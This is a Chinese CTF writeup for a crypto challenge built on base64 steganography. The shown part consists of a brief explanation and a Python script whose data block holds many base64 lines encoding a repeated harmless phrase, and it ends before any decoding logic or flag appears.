2025" 星芒杯"高校联盟CTF夺旗赛Writeup

队伍名称:Drifting

xmb0.jpg

Crypto-俄罗斯套码

先下载附件并打开

xmb1.png

可以一眼看出使一堆base64,但是直接解是不能解出来,可以猜测是一个base64隐写,应为base64隐写都是一大串的base64,所以可以使用脚本进行base64隐写解密,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
import base64

encoded_lines = """
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P/==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P/==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P+==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P5==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P+==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Px==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P3==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P+==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P/==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Px==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Px==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
